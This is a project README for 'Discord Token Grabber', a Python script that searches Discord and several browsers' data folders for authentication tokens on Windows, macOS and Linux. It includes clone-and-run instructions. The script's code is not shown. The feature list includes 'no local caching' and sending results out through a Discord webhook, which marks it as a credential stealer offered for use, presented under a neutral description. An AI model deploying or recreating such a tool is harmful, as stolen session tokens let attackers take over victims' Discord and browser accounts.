Discord Token Grabber is a Python script that helps you find and extract tokens used by various applications on different operating systems. Tokens are commonly used for authentication purposes in applications like Discord, web browsers, and more.
- No local caching
- Transfers via Discord webhook
- Searches for authorization tokens in multiple directories (Discord, Discord PTB, Discord Canary, Google chrome, Opera, Brave and Yandex)
- No external Python modules required
- Cross-platform support
- Python 3.x
- Clone the repository:
git clone https://github.com/Fastiraz/Discord-Tokens-Grabber.git
- Navigate to the project directory:
cd Discord-Tokens-Grabber
- Open a terminal or command prompt.
- Navigate to the project directory where the script is located.
- Run the script:
For Windows
py grab.py
For Unix/Linux
python3 grab.py
-
The script will detect your operating system and attempt to find tokens for supported applications.
-
Tokens, if found, will be displayed in the terminal.
- Linux
- macOS (Darwin)
- Windows
- Google Chrome
- Discord
- Discord Canary
- Discord PTB
- Opera
- Brave
- Yandex
Please note that the paths to application data may vary depending on your specific setup, and permissions may be required to access certain directories.